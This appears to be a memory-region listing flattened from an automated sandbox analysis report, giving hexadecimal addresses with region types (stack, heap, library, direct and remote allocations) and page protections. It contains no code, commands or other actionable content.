|
D52DCFE000
|
stack
|
page read and write
|
||
|
210AAC4F000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
2FA7000
|
stack
|
page read and write
|
||
|
2D4D000
|
stack
|
page read and write
|
||
|
210AC590000
|
heap
|
page read and write
|
||
|
8AFC000
|
stack
|
page read and write
|
||
|
2087CA28000
|
trusted library allocation
|
page read and write
|
||
|
D52DA7E000
|
unkown
|
page readonly
|
||
|
4030000
|
remote allocation
|
page execute and read and write
|
||
|
2087CA10000
|
trusted library allocation
|
page read and write
|
||
|
2087CAAE000
|
trusted library allocation
|
page read and write
|
||
|
348F000
|
unkown
|
page read and write
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
9AB1B8F000
|
stack
|
page read and write
|
||
|
2087CA76000
|
trusted library allocation
|
page read and write
|
||
|
20877D1B000
|
heap
|
page read and write
|
||
|
89A5000
|
trusted library allocation
|
page read and write
|
||
|
20877260000
|
heap
|
page read and write
|
||
|
214BE000
|
stack
|
page read and write
|
||
|
8BC5000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
54F5000
|
remote allocation
|
page execute and read and write
|
||
|
210AC550000
|
heap
|
page readonly
|
||
|
2087C8F9000
|
heap
|
page read and write
|
||
|
20877240000
|
heap
|
page read and write
|
||
|
36AF000
|
stack
|
page read and write
|
||
|
210AEC34000
|
trusted library allocation
|
page read and write
|
||
|
35BE000
|
heap
|
page read and write
|
||
|
9AB207E000
|
stack
|
page read and write
|
||
|
59B8000
|
heap
|
page read and write
|
||
|
8C0D000
|
heap
|
page read and write
|
||
|
D52E27B000
|
stack
|
page read and write
|
||
|
20FF0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
heap
|
page execute and read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
2087C8FE000
|
heap
|
page read and write
|
||
|
210AD705000
|
trusted library allocation
|
page read and write
|
||
|
210ACB23000
|
heap
|
page read and write
|
||
|
8E20000
|
trusted library allocation
|
page read and write
|
||
|
7DF406F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
D52E0FE000
|
stack
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
3288000
|
heap
|
page read and write
|
||
|
210AE111000
|
trusted library allocation
|
page read and write
|
||
|
7962000
|
heap
|
page read and write
|
||
|
D52D57B000
|
stack
|
page read and write
|
||
|
213FE000
|
stack
|
page read and write
|
||
|
20878420000
|
trusted library section
|
page readonly
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
trusted library allocation
|
page read and write
|
||
|
210ACB8A000
|
heap
|
page read and write
|
||
|
210C4EBC000
|
heap
|
page read and write
|
||
|
210C4F39000
|
heap
|
page read and write
|
||
|
75E0000
|
heap
|
page read and write
|
||
|
5800000
|
heap
|
page read and write
|
||
|
9AB308D000
|
stack
|
page read and write
|
||
|
14D5CFF000
|
stack
|
page read and write
|
||
|
34EE000
|
stack
|
page read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
5860000
|
direct allocation
|
page read and write
|
||
|
2087CB3A000
|
trusted library allocation
|
page read and write
|
||
|
D52DF7E000
|
unkown
|
page readonly
|
||
|
7FFD9B8FB000
|
trusted library allocation
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
7FC20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DFE000
|
unkown
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
78D7000
|
trusted library allocation
|
page read and write
|
||
|
208774B1000
|
heap
|
page read and write
|
||
|
1A44F710000
|
heap
|
page read and write
|
||
|
20877529000
|
heap
|
page read and write
|
||
|
2087CB60000
|
trusted library allocation
|
page read and write
|
||
|
88AE000
|
stack
|
page read and write
|
||
|
210AEE6A000
|
trusted library allocation
|
page read and write
|
||
|
20877D1A000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
6249000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A1E000
|
heap
|
page read and write
|
||
|
2087CB1F000
|
trusted library allocation
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
20877492000
|
heap
|
page read and write
|
||
|
2087C911000
|
heap
|
page read and write
|
||
|
327E000
|
stack
|
page read and write
|
||
|
57D8000
|
trusted library allocation
|
page read and write
|
||
|
210ACB5D000
|
heap
|
page read and write
|
||
|
331D000
|
stack
|
page read and write
|
||
|
35B2000
|
heap
|
page read and write
|
||
|
520B000
|
trusted library allocation
|
page read and write
|
||
|
2087CBC0000
|
remote allocation
|
page read and write
|
||
|
89B0000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
358C000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
D52DDFE000
|
stack
|
page read and write
|
||
|
4E5C000
|
stack
|
page read and write
|
||
|
5805000
|
heap
|
page read and write
|
||
|
9AB1AC5000
|
stack
|
page read and write
|
||
|
20877D5A000
|
heap
|
page read and write
|
||
|
D52E17E000
|
unkown
|
page readonly
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
210C4E20000
|
heap
|
page execute and read and write
|
||
|
364A000
|
heap
|
page read and write
|
||
|
210C4E4C000
|
heap
|
page read and write
|
||
|
5A23000
|
heap
|
page read and write
|
||
|
7520000
|
direct allocation
|
page read and write
|
||
|
210AE8CE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
214FC000
|
stack
|
page read and write
|
||
|
210BCC91000
|
trusted library allocation
|
page read and write
|
||
|
210ACB5F000
|
heap
|
page read and write
|
||
|
20877454000
|
heap
|
page read and write
|
||
|
59CA000
|
heap
|
page read and write
|
||
|
8B8C000
|
stack
|
page read and write
|
||
|
3570000
|
trusted library allocation
|
page execute and read and write
|
||
|
D52DFFE000
|
stack
|
page read and write
|
||
|
2147B000
|
stack
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
210BCF8E000
|
trusted library allocation
|
page read and write
|
||
|
4F38000
|
heap
|
page read and write
|
||
|
2087C800000
|
heap
|
page read and write
|
||
|
7BB7000
|
trusted library allocation
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
2087C8E8000
|
heap
|
page read and write
|
||
|
35CF000
|
stack
|
page read and write
|
||
|
20877413000
|
heap
|
page read and write
|
||
|
20F3F000
|
stack
|
page read and write
|
||
|
57A0000
|
heap
|
page read and write
|
||
|
5A0C000
|
heap
|
page read and write
|
||
|
20877475000
|
heap
|
page read and write
|
||
|
59AB000
|
heap
|
page read and write
|
||
|
2087CA6D000
|
trusted library allocation
|
page read and write
|
||
|
9AB253F000
|
stack
|
page read and write
|
||
|
20C20000
|
heap
|
page read and write
|
||
|
210C4E30000
|
heap
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
5890000
|
direct allocation
|
page read and write
|
||
|
A085000
|
direct allocation
|
page execute and read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
20D90000
|
heap
|
page read and write
|
||
|
8E1D000
|
stack
|
page read and write
|
||
|
AA85000
|
direct allocation
|
page execute and read and write
|
||
|
D52C9AB000
|
stack
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
5830000
|
direct allocation
|
page read and write
|
||
|
7C6E000
|
stack
|
page read and write
|
||
|
7AB1000
|
heap
|
page read and write
|
||
|
7FFD9B996000
|
trusted library allocation
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
3450000
|
trusted library allocation
|
page read and write
|
||
|
210AC627000
|
heap
|
page read and write
|
||
|
2087C898000
|
heap
|
page read and write
|
||
|
2087CA50000
|
trusted library allocation
|
page read and write
|
||
|
2087CA20000
|
trusted library allocation
|
page read and write
|
||
|
21000000
|
direct allocation
|
page read and write
|
||
|
210AABE3000
|
heap
|
page read and write
|
||
|
D52E97E000
|
unkown
|
page readonly
|
||
|
74C0000
|
direct allocation
|
page read and write
|
||
|
210AC510000
|
trusted library allocation
|
page read and write
|
||
|
50A0000
|
heap
|
page read and write
|
||
|
2087CAE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
210AD255000
|
trusted library allocation
|
page read and write
|
||
|
343F000
|
stack
|
page read and write
|
||
|
4F20000
|
heap
|
page execute and read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
210C4EA4000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
D52E37E000
|
unkown
|
page readonly
|
||
|
7CAE000
|
stack
|
page read and write
|
||
|
2087C908000
|
heap
|
page read and write
|
||
|
7FFD9B99C000
|
trusted library allocation
|
page execute and read and write
|
||
|
210AEA3B000
|
trusted library allocation
|
page read and write
|
||
|
1A44F470000
|
heap
|
page read and write
|
||
|
210AC540000
|
trusted library allocation
|
page read and write
|
||
|
8C03000
|
heap
|
page read and write
|
||
|
2087C900000
|
heap
|
page read and write
|
||
|
D52E07E000
|
unkown
|
page readonly
|
||
|
210AC5A0000
|
trusted library allocation
|
page read and write
|
||
|
2087CA40000
|
trusted library allocation
|
page read and write
|
||
|
4EFE000
|
stack
|
page read and write
|
||
|
9AB20FE000
|
stack
|
page read and write
|
||
|
C3D000
|
stack
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
7B45000
|
heap
|
page read and write
|
||
|
2087CA38000
|
trusted library allocation
|
page read and write
|
||
|
57C0000
|
heap
|
page readonly
|
||
|
210AABE8000
|
heap
|
page read and write
|
||
|
210AC480000
|
heap
|
page read and write
|
||
|
3558000
|
trusted library allocation
|
page read and write
|
||
|
1A44F540000
|
heap
|
page read and write
|
||
|
D52DE7E000
|
unkown
|
page readonly
|
||
|
208787A0000
|
trusted library allocation
|
page read and write
|
||
|
D52D77B000
|
stack
|
page read and write
|
||
|
D52E8FE000
|
stack
|
page read and write
|
||
|
D52D379000
|
stack
|
page read and write
|
||
|
2087CA2E000
|
trusted library allocation
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
30FE000
|
stack
|
page read and write
|
||
|
33D0000
|
trusted library section
|
page read and write
|
||
|
5840000
|
direct allocation
|
page read and write
|
||
|
20878320000
|
trusted library allocation
|
page read and write
|
||
|
215FD000
|
stack
|
page read and write
|
||
|
20877380000
|
trusted library section
|
page read and write
|
||
|
2087CB1C000
|
trusted library allocation
|
page read and write
|
||
|
7B15000
|
heap
|
page read and write
|
||
|
210AABA6000
|
heap
|
page read and write
|
||
|
5850000
|
direct allocation
|
page read and write
|
||
|
7A59000
|
heap
|
page read and write
|
||
|
210BCCA0000
|
trusted library allocation
|
page read and write
|
||
|
20877E01000
|
trusted library allocation
|
page read and write
|
||
|
31DE000
|
stack
|
page read and write
|
||
|
2087C858000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
210AE897000
|
trusted library allocation
|
page read and write
|
||
|
2087CA8C000
|
trusted library allocation
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
7860000
|
direct allocation
|
page read and write
|
||
|
2087C914000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
2087CADA000
|
trusted library allocation
|
page read and write
|
||
|
7555000
|
heap
|
page execute and read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
C7E000
|
stack
|
page read and write
|
||
|
8DDE000
|
stack
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
20D4E000
|
stack
|
page read and write
|
||
|
5959000
|
heap
|
page read and write
|
||
|
210AAB9D000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
2087C887000
|
heap
|
page read and write
|
||
|
3480000
|
trusted library allocation
|
page read and write
|
||
|
210AD711000
|
trusted library allocation
|
page read and write
|
||
|
9AB1F7E000
|
stack
|
page read and write
|
||
|
2087747C000
|
heap
|
page read and write
|
||
|
21010000
|
direct allocation
|
page read and write
|
||
|
2DFD000
|
stack
|
page read and write
|
||
|
210C4D00000
|
heap
|
page read and write
|
||
|
2087CA20000
|
trusted library allocation
|
page read and write
|
||
|
2087CAB1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
210BCCB1000
|
trusted library allocation
|
page read and write
|
||
|
2087742B000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A44F814000
|
heap
|
page read and write
|
||
|
1A44F54B000
|
heap
|
page read and write
|
||
|
210AAC46000
|
heap
|
page read and write
|
||
|
321F000
|
stack
|
page read and write
|
||
|
210AD6E4000
|
trusted library allocation
|
page read and write
|
||
|
347A000
|
trusted library allocation
|
page execute and read and write
|
||
|
D52DC7E000
|
unkown
|
page readonly
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
88B0000
|
heap
|
page read and write
|
||
|
2087C7A0000
|
trusted library allocation
|
page read and write
|
||
|
20877D0C000
|
heap
|
page read and write
|
||
|
20877C00000
|
heap
|
page read and write
|
||
|
59C6000
|
heap
|
page read and write
|
||
|
50B1000
|
trusted library allocation
|
page read and write
|
||
|
210AD32F000
|
trusted library allocation
|
page read and write
|
||
|
D52DBFE000
|
stack
|
page read and write
|
||
|
2087C841000
|
heap
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
2087CB50000
|
trusted library allocation
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
3460000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1A44F4A0000
|
heap
|
page read and write
|
||
|
2087CB11000
|
trusted library allocation
|
page read and write
|
||
|
335F000
|
stack
|
page read and write
|
||
|
D52D87E000
|
unkown
|
page readonly
|
||
|
57F0000
|
direct allocation
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
2087C81F000
|
heap
|
page read and write
|
||
|
2105E000
|
stack
|
page read and write
|
||
|
20878440000
|
trusted library section
|
page readonly
|
||
|
20877BC1000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
direct allocation
|
page read and write
|
||
|
7870000
|
direct allocation
|
page read and write
|
||
|
20877443000
|
heap
|
page read and write
|
||
|
2137C000
|
stack
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
208774A1000
|
heap
|
page read and write
|
||
|
7A69000
|
heap
|
page read and write
|
||
|
7FFD9BA91000
|
trusted library allocation
|
page read and write
|
||
|
2087CA64000
|
trusted library allocation
|
page read and write
|
||
|
3470000
|
trusted library allocation
|
page read and write
|
||
|
74F0000
|
direct allocation
|
page read and write
|
||
|
8E40000
|
trusted library allocation
|
page read and write
|
||
|
2087CA84000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
2087CB08000
|
trusted library allocation
|
page read and write
|
||
|
210AEC56000
|
trusted library allocation
|
page read and write
|
||
|
D52DEFE000
|
stack
|
page read and write
|
||
|
D52D17E000
|
stack
|
page read and write
|
||
|
1A44F815000
|
heap
|
page read and write
|
||
|
5900000
|
direct allocation
|
page read and write
|
||
|
210AC620000
|
heap
|
page read and write
|
||
|
2087CB05000
|
trusted library allocation
|
page read and write
|
||
|
20FE0000
|
direct allocation
|
page read and write
|
||
|
208774B6000
|
heap
|
page read and write
|
||
|
2087C8C0000
|
heap
|
page read and write
|
||
|
8BA4000
|
heap
|
page read and write
|
||
|
210AC560000
|
trusted library allocation
|
page read and write
|
||
|
57E0000
|
direct allocation
|
page read and write
|
||
|
210AD54D000
|
trusted library allocation
|
page read and write
|
||
|
87D0000
|
heap
|
page read and write
|
||
|
2087747A000
|
heap
|
page read and write
|
||
|
210AD6B3000
|
trusted library allocation
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
2087745C000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
heap
|
page read and write
|
||
|
8E90000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A0C000
|
heap
|
page read and write
|
||
|
213BC000
|
stack
|
page read and write
|
||
|
58C7000
|
heap
|
page read and write
|
||
|
5A25000
|
heap
|
page read and write
|
||
|
5880000
|
direct allocation
|
page read and write
|
||
|
210C4F5B000
|
heap
|
page read and write
|
||
|
21280000
|
remote allocation
|
page read and write
|
||
|
58A0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7530000
|
direct allocation
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
2157D000
|
stack
|
page read and write
|
||
|
20877490000
|
heap
|
page read and write
|
||
|
210ACAF5000
|
heap
|
page read and write
|
||
|
2087CB90000
|
trusted library allocation
|
page read and write
|
||
|
60D9000
|
trusted library allocation
|
page read and write
|
||
|
58F0000
|
direct allocation
|
page read and write
|
||
|
2087CB00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E4000
|
trusted library allocation
|
page read and write
|
||
|
4F7F000
|
stack
|
page read and write
|
||
|
2087CB70000
|
trusted library allocation
|
page read and write
|
||
|
60B1000
|
trusted library allocation
|
page read and write
|
||
|
303D000
|
stack
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page read and write
|
||
|
21170000
|
heap
|
page read and write
|
||
|
D52DB7E000
|
unkown
|
page readonly
|
||
|
210AD1AD000
|
trusted library allocation
|
page read and write
|
||
|
507E000
|
stack
|
page read and write
|
||
|
212BE000
|
stack
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
210AE8AB000
|
trusted library allocation
|
page read and write
|
||
|
210AEE7E000
|
trusted library allocation
|
page read and write
|
||
|
2087D000000
|
heap
|
page read and write
|
||
|
3453000
|
trusted library allocation
|
page execute and read and write
|
||
|
20877496000
|
heap
|
page read and write
|
||
|
2087CA24000
|
trusted library allocation
|
page read and write
|
||
|
8E70000
|
trusted library allocation
|
page read and write
|
||
|
210AAE65000
|
heap
|
page read and write
|
||
|
3530000
|
heap
|
page readonly
|
||
|
210BCF7F000
|
trusted library allocation
|
page read and write
|
||
|
34CE000
|
stack
|
page read and write
|
||
|
14D5BFF000
|
unkown
|
page read and write
|
||
|
5820000
|
direct allocation
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
210AEC41000
|
trusted library allocation
|
page read and write
|
||
|
20C8D000
|
stack
|
page read and write
|
||
|
2087CA21000
|
trusted library allocation
|
page read and write
|
||
|
7BE0000
|
heap
|
page execute and read and write
|
||
|
5A0C000
|
heap
|
page read and write
|
||
|
34A0000
|
trusted library allocation
|
page read and write
|
||
|
8E80000
|
direct allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
7B0A000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
trusted library section
|
page read and write
|
||
|
210AECAE000
|
trusted library allocation
|
page read and write
|
||
|
210AECAA000
|
trusted library allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
210AE8BD000
|
trusted library allocation
|
page read and write
|
||
|
20877D00000
|
heap
|
page read and write
|
||
|
210ACB1F000
|
heap
|
page read and write
|
||
|
2087CAC0000
|
trusted library allocation
|
page read and write
|
||
|
210AEE64000
|
trusted library allocation
|
page read and write
|
||
|
4FBE000
|
stack
|
page read and write
|
||
|
210ACC80000
|
heap
|
page execute and read and write
|
||
|
7BCA000
|
trusted library allocation
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
3454000
|
trusted library allocation
|
page read and write
|
||
|
210AD6DA000
|
trusted library allocation
|
page read and write
|
||
|
20EFE000
|
stack
|
page read and write
|
||
|
7FFD9B93C000
|
trusted library allocation
|
page execute and read and write
|
||
|
210ACEBD000
|
trusted library allocation
|
page read and write
|
||
|
D52D97B000
|
stack
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
2143F000
|
stack
|
page read and write
|
||
|
88C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2087CA00000
|
trusted library allocation
|
page read and write
|
||
|
2087CA22000
|
trusted library allocation
|
page read and write
|
||
|
9AB1EFD000
|
stack
|
page read and write
|
||
|
20878410000
|
trusted library section
|
page readonly
|
||
|
20877500000
|
heap
|
page read and write
|
||
|
7CF7000
|
trusted library allocation
|
page read and write
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
210ACAC0000
|
heap
|
page read and write
|
||
|
2087747E000
|
heap
|
page read and write
|
||
|
316C000
|
heap
|
page read and write
|
||
|
210AD6BD000
|
trusted library allocation
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page read and write
|
||
|
9AB1E7E000
|
stack
|
page read and write
|
||
|
4EA0000
|
trusted library allocation
|
page read and write
|
||
|
36B0000
|
heap
|
page read and write
|
||
|
210AD0A6000
|
trusted library allocation
|
page read and write
|
||
|
210C4E65000
|
heap
|
page read and write
|
||
|
210AC625000
|
heap
|
page read and write
|
||
|
9AB263B000
|
stack
|
page read and write
|
||
|
87C7000
|
stack
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
338E000
|
unkown
|
page read and write
|
||
|
210C4D20000
|
heap
|
page read and write
|
||
|
8BA0000
|
heap
|
page read and write
|
||
|
210AE2DA000
|
trusted library allocation
|
page read and write
|
||
|
2087CA50000
|
trusted library allocation
|
page read and write
|
||
|
21330000
|
heap
|
page read and write
|
||
|
9AB217C000
|
stack
|
page read and write
|
||
|
1A44F480000
|
heap
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
2087C854000
|
heap
|
page read and write
|
||
|
210AC5D0000
|
trusted library allocation
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
8E50000
|
trusted library allocation
|
page read and write
|
||
|
3482000
|
trusted library allocation
|
page read and write
|
||
|
21280000
|
remote allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
33BE000
|
stack
|
page read and write
|
||
|
59CD000
|
heap
|
page read and write
|
||
|
2087C861000
|
heap
|
page read and write
|
||
|
345D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
210AEBB4000
|
trusted library allocation
|
page read and write
|
||
|
2153E000
|
stack
|
page read and write
|
||
|
D52CF77000
|
stack
|
page read and write
|
||
|
210ACAD0000
|
heap
|
page read and write
|
||
|
2DDD000
|
stack
|
page read and write
|
||
|
20877370000
|
trusted library allocation
|
page read and write
|
||
|
8BD5000
|
heap
|
page read and write
|
||
|
7850000
|
direct allocation
|
page read and write
|
||
|
EDC000
|
stack
|
page read and write
|
||
|
2109F000
|
stack
|
page read and write
|
||
|
8ABC000
|
stack
|
page read and write
|
||
|
7880000
|
direct allocation
|
page read and write
|
||
|
9AB1B4E000
|
stack
|
page read and write
|
||
|
210AAE60000
|
heap
|
page read and write
|
||
|
9AB300F000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
210AD6A4000
|
trusted library allocation
|
page read and write
|
||
|
58D0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B8E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2087CA60000
|
trusted library allocation
|
page read and write
|
||
|
210ED000
|
stack
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
2087CB80000
|
trusted library allocation
|
page read and write
|
||
|
58B0000
|
direct allocation
|
page read and write
|
||
|
210C4E27000
|
heap
|
page execute and read and write
|
||
|
74D0000
|
direct allocation
|
page read and write
|
||
|
210AAA80000
|
heap
|
page read and write
|
||
|
7E3C000
|
stack
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
2087CA35000
|
trusted library allocation
|
page read and write
|
||
|
2087CA92000
|
trusted library allocation
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
2163F000
|
stack
|
page read and write
|
||
|
59DE000
|
heap
|
page read and write
|
||
|
210AAC4B000
|
heap
|
page read and write
|
||
|
8ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AAF000
|
heap
|
page read and write
|
||
|
D52D47E000
|
unkown
|
page readonly
|
||
|
886D000
|
stack
|
page read and write
|
||
|
2087C84E000
|
heap
|
page read and write
|
||
|
20877340000
|
heap
|
page read and write
|
||
|
74E0000
|
direct allocation
|
page read and write
|
||
|
7DB0000
|
trusted library allocation
|
page read and write
|
||
|
8E30000
|
trusted library allocation
|
page read and write
|
||
|
2087CB70000
|
trusted library allocation
|
page read and write
|
||
|
210AAC6F000
|
heap
|
page read and write
|
||
|
5A0C000
|
heap
|
page read and write
|
||
|
8B4E000
|
stack
|
page read and write
|
||
|
D52D07E000
|
unkown
|
page readonly
|
||
|
2087CBC0000
|
remote allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
2087C902000
|
heap
|
page read and write
|
||
|
354B000
|
heap
|
page read and write
|
||
|
20CCD000
|
stack
|
page read and write
|
||
|
6243000
|
trusted library allocation
|
page read and write
|
||
|
7A89000
|
heap
|
page read and write
|
||
|
210AAC90000
|
heap
|
page read and write
|
||
|
2087C8DA000
|
heap
|
page read and write
|
||
|
5870000
|
direct allocation
|
page read and write
|
||
|
210ACC91000
|
trusted library allocation
|
page read and write
|
||
|
4AF5000
|
remote allocation
|
page execute and read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC2000
|
trusted library allocation
|
page read and write
|
||
|
14D5AFD000
|
stack
|
page read and write
|
||
|
210AEC66000
|
trusted library allocation
|
page read and write
|
||
|
20878140000
|
trusted library allocation
|
page read and write
|
||
|
2087C90E000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
D52D27E000
|
unkown
|
page readonly
|
||
|
2087CBC0000
|
remote allocation
|
page read and write
|
||
|
20D0D000
|
stack
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
20878430000
|
trusted library section
|
page readonly
|
||
|
5810000
|
direct allocation
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
87E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
210ACAA0000
|
heap
|
page execute and read and write
|
||
|
210AD6F7000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
59C6000
|
heap
|
page read and write
|
||
|
7CED000
|
stack
|
page read and write
|
||
|
5A0B000
|
heap
|
page read and write
|
||
|
210AD6F0000
|
trusted library allocation
|
page read and write
|
||
|
40F5000
|
remote allocation
|
page execute and read and write
|
||
|
D52D67E000
|
unkown
|
page readonly
|
||
|
2087CAC3000
|
trusted library allocation
|
page read and write
|
||
|
9AB24BE000
|
stack
|
page read and write
|
||
|
352E000
|
stack
|
page read and write
|
||
|
503E000
|
stack
|
page read and write
|
||
|
9AB25BE000
|
stack
|
page read and write
|
||
|
611D000
|
trusted library allocation
|
page read and write
|
||
|
3469000
|
trusted library allocation
|
page read and write
|
||
|
210C4F01000
|
heap
|
page read and write
|
||
|
210AEC44000
|
trusted library allocation
|
page read and write
|
||
|
2087C82C000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E2000
|
trusted library allocation
|
page read and write
|
||
|
58C0000
|
heap
|
page read and write
|
||
|
212FF000
|
stack
|
page read and write
|
||
|
210AAC53000
|
heap
|
page read and write
|
||
|
3485000
|
trusted library allocation
|
page execute and read and write
|
||
|
314C000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7ABE000
|
heap
|
page read and write
|
||
|
20877BF0000
|
trusted library allocation
|
page read and write
|
||
|
2087C8C7000
|
heap
|
page read and write
|
||
|
20878400000
|
trusted library section
|
page readonly
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
210AAB60000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
210ACB1C000
|
heap
|
page read and write
|
||
|
7FFD9BA9A000
|
trusted library allocation
|
page read and write
|
||
|
210AEC3A000
|
trusted library allocation
|
page read and write
|
||
|
20877502000
|
heap
|
page read and write
|
||
|
2112C000
|
stack
|
page read and write
|
||
|
20877C15000
|
heap
|
page read and write
|
||
|
20877400000
|
heap
|
page read and write
|
||
|
20877D02000
|
heap
|
page read and write
|
||
|
D52DAFE000
|
stack
|
page read and write
|
